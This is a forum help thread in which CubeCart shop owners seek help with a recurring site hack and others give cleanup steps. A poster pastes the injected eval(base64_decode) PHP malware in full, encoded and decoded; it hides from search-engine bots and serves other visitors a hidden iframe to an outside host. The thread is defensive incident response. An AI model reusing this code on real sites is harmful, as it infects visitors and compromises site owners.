Need help with eval(base64_decode hack

[Guest]

Hello,

Since a couple of days my shop doesn't work anymore, the url is: http://www.victorianscarlettdesigns.com/shop/ I get the announcement "Parse error: syntax error, unexpected '<' in /public/sites/www.victorianscarlettdesigns.com/shop/includes/content/index.inc.php on line 1" and when I check this file it indeed shows me an eval(base64_decode plus lots of figures at the very top of the file. I removed it and my shop was working again, but later on it mysteriously returned again and my shop went down again. I have since done everything that was mentioned in the important announcement for cc3 users, concerning the hack of the base files which are downloadable from the cc website, and all seemed to go well for a while, but after a few hours the eval(base64_decode returned into the index.inc.php file again (but there were less characters and figures now, so I think the changes I made which were mentioned in the announcement post did part of the trick!). Problem is that there's still a problem because the code keeps popping back into the index.inc.php file and I can't seem to find the reason why. I tried using a base64 decoder but I don't understand how I might be able to see which files I need to remove/alter to get my shop back working again. Unfortunately I don't have a back up that's 100% trustworthy because I'm still working on my shop and I'm doing this together with an overseas friend so making a consistent back up is difficult

Can anybody help me with this? The code that keeps coming back at the top from the index.inc.php file is this:

<?<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOwokYm90ID0gRkFMU0UgOwokdXNlcl9hZ2VudF90b19maWx0ZXIgPSBhcnJheSgnYm90Jywnc3BpZGVyJywnc3B5ZGVyJywnY3Jhd2wnLCd2YWxpZGF0b3InLCdzbHVycCcsJ2RvY29tbycsJ3lhbmRleCcsJ21haWwucnUnLCdhbGV4YS5jb20nLCdwb3N0cmFuay5jb20nLCdodG1sZG9jJywnd2ViY29sbGFnZScsJ2Jsb2dwdWxzZS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJzEyMzQ1JywnaHR0cGNsaWVudCcsJ2J1enp0cmFja2VyLmNvbScsJ3Nub29weScsJ2ZlZWR0b29scycsJ2FyaWFubmEubGliZXJvLml0JywnaW50ZXJuZXRzZWVyLmNvbScsJ29wZW5hY29vbi5kZScsJ3JycnJycnJycicsJ21hZ2VudCcsJ2Rvd25sb2FkIG1hc3RlcicsJ2RydXBhbC5vcmcnLCd2bGMgbWVkaWEgcGxheWVyJywndnZya2ltc2p1d2x5IGwzdWZtanJ4Jywnc3puLWltYWdlLXJlc2l6ZXInLCdiZGJyYW5kcHJvdGVjdC5jb20nLCd3b3JkcHJlc3MnLCdyc3NyZWFkZXInLCdteWJsb2dsb2cgYXBpJyk7CiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KAoJYXJyYXkoIjIxNi4yMzkuMzIuMCIsIjIxNi4yMzkuNjMuMjU1IiksCglhcnJheSgiNjQuNjguODAuMCIgICwiNjQuNjguODcuMjU1IiAgKSwKCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksCglhcnJheSgiNjQuMjMzLjE2MC4wIiwiNjQuMjMzLjE5MS4yNTUiKSwKCWFycmF5KCI2Ni4yNDkuNjQuMCIsICI2Ni4yNDkuOTUuMjU1IiksCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLAoJYXJyYXkoIjIwOS44NS4xMjguMCIsIjIwOS44NS4yNTUuMjU1IiksCglhcnJheSgiMTk4LjEwOC4xMDAuMTkyIiwiMTk4LjEwOC4xMDAuMjA3IiksCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwKCWFycmF5KCIyMTYuMzMuMjI5LjE0NCIsIjIxNi4zMy4yMjkuMTUxIiksCglhcnJheSgiMjE2LjMzLjIyOS4xNjAiLCIyMTYuMzMuMjI5LjE2NyIpLAoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLAoJYXJyYXkoIjIxNi4xMDkuNzUuODAiLCIyMTYuMTA5Ljc1Ljk1IiksCglhcnJheSgiNjQuNjguODguMCIsIjY0LjY4Ljk1LjI1NSIpLAoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksCglhcnJheSgiNjQuNDEuMjIxLjE5MiIsIjY0LjQxLjIyMS4yMDciKSwKCWFycmF5KCI3NC4xMjUuMC4wIiwiNzQuMTI1LjI1NS4yNTUiKSwKCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksCglhcnJheSgiNzQuNi4wLjAiLCI3NC42LjI1NS4yNTUiKSwKCWFycmF5KCI2Ny4xOTUuMC4wIiwiNjcuMTk1LjI1NS4yNTUiKSwKCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksCglhcnJheSgiMzguMC4wLjAiLCIzOC4yNTUuMjU1LjI1NSIpCgkpOwokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7CmZvcmVhY2ggKCAkc3RvcF9pcHNfbWFza3MgYXMgJElQcyApIHsKCSRmaXJzdF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMF0pKTsgJHNlY29uZF9kPXNwcmludGYoIiV1IixpcDJsb25nKCRJUHNbMV0pKTsKCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQp9CmZvcmVhY2ggKCR1c2VyX2FnZW50X3RvX2ZpbHRlciBhcyAkYm90X3NpZ24pewoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30KfQppZiAoISRib3QpIHsNCmVjaG8gJzxpZnJhbWUgc3JjPSJodHRwOi8vc2dzZGdzZy52di5jYy9RUWtGQmcwQUFRME1CQTBERWtjSkJRWU5Bd2NDQVFNTUF3PT0iIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaWZyYW1lPic7DQp9'));

/*

And when I use this decoder here: http://www.motobit.com/util/base64-decoder-encoder.asp it gives me this in return:

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

	array("216.239.32.0","216.239.63.255"),

	array("64.68.80.0"  ,"64.68.87.255"  ),

	array("66.102.0.0",  "66.102.15.255"),

	array("64.233.160.0","64.233.191.255"),

	array("66.249.64.0", "66.249.95.255"),

	array("72.14.192.0", "72.14.255.255"),

	array("209.85.128.0","209.85.255.255"),

	array("198.108.100.192","198.108.100.207"),

	array("173.194.0.0","173.194.255.255"),

	array("216.33.229.144","216.33.229.151"),

	array("216.33.229.160","216.33.229.167"),

	array("209.185.108.128","209.185.108.255"),

	array("216.109.75.80","216.109.75.95"),

	array("64.68.88.0","64.68.95.255"),

	array("64.68.64.64","64.68.64.127"),

	array("64.41.221.192","64.41.221.207"),

	array("74.125.0.0","74.125.255.255"),

	array("65.52.0.0","65.55.255.255"),

	array("74.6.0.0","74.6.255.255"),

	array("67.195.0.0","67.195.255.255"),

	array("72.30.0.0","72.30.255.255"),

	array("38.0.0.0","38.255.255.255")

	);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

	if  (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="http://sgsdgsg.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';

}

I have tried many things, and tried searching all the files of my shop in search for more files that have these eval(base64_decode codes at the top, but there were none, I only found out that one of the mods I have for images viewing in Javascript (from Estelle) is containing a eval(base64_decode but it's not at the top of the page and if I remove this, the extra pictures shown with every item disappear. But that may also be because I unknowingly remove too much of the code.

Please help me if you can, it's much appreciated because I'm kind of at my wit's end with this and want to solve it so badly!

Thank you very much!

[bsmither]

I can certainly try to help. The first thing would be for you to look at the timestamps of every file in the CC installation and note any files that do not have a reasonable date. An unreasonable date would be any file with a date not like the others, and that you know you haven't modified it. Yes, I know this will take some minutes to do.

[Guest]

I can certainly try to help. The first thing would be for you to look at the timestamps of every file in the CC installation and note any files that do not have a reasonable date. An unreasonable date would be any file with a date not like the others, and that you know you haven't modified it. Yes, I know this will take some minutes to do.

Thank you so much for trying to help! It's very difficult to determine whether or not I or my friend was the one who altered the files with different dates, but I just checked every single file for an unreasonable date. As far as I can see it, and as far as I can think back to know íf and if so, whát I've done for my shop on those dates, I haven't been able to find a date on a file that wouldn't need to have that date I did find a folder named Cache in the Admin folder which contains a file with an unreadable name (random characters), maybe that's something? I also found the eval(base64_decode (followed with random characters) in 2 files that are connected to the Javascript images review mod from Estelle.

Maybe I need to search for certain unreasonable files or something?

Thank you, I really appreciate your help!

[bsmither]

Could you email me those two files that are part of the javascript review mod? I'll will send you my email address in a private message.

[Guest]

Thank you very much, I e-mailed right away, hope you received it without problems!

[Guest]

Thanks to bsmither we found out what the problem was, my shop is now working again! I would like to close this thread, but I don't know how to add a [resolved] to the title of this post.

[Guest Sallyb]

Hi l am also having eval()'d code:37) problems. I am receiving the errors

"Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home.../public_html/store/index.php(1) : eval()'d code:37) in /home/.../public_html/store/includes/sessionStart.inc.php on line 39

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/.../public_html/store/index.php(1) : eval()'d code:37) in /home.../public_html/store/includes/sessionStart.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/store/index.php(1) : eval()'d code:37) in /home.../public_html/store/includes/session.inc.php on line 95"

I know the site has been hack and l have followed the instructions at Important CubeCart v3 Security Announcement but l am still getting the above errors.

Please help :cry:

[bsmither]

Look for these files and delete if found:

/store/images/uploads/thumbs/imageth.php

/store/images/uploads/random/chars/T.php

Scan your files looking for any file that has a filedate of a few days ago. These will be damaged files. If you know that *you* edited it (installing a mod, for example), then it may be ok.

Look for a line of jibberish that appears on the top line and delete everything on that line except for <?php.

Also look for code at the bottom of the file that looks like:

?><?php eval(base64_decode(...

and delete everything after the ?>

Fix the following files (if damaged):

/store/index.php

/store/includes/content/index.inc.php

/store/includes/boxes/siteDocs.inc.php

/store/languages/nl/lang.inc.php

Delete your installation directory if it still exists.

Because your store is a sub-directory of your main site, files in your main site and other sub-directories may have been damaged. Scan for filedates of a few days ago in all folders as well.

Send me a Private Message if you wish personal assistance.

[Mike MacKechnie]

Thanks to bsmither we found out what the problem was, my shop is now working again! I would like to close this thread, but I don't know how to add a [resolved] to the title of this post.

Raven, Raven, Raven, for goodness' sake don't close the thread without telling us what the problem was and how you found it!!!!

This is a very widespread hack that has caused me and many other people no end of problems in the past fortnight.

There is a good article at http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/ whcih describes what I think is the same attack.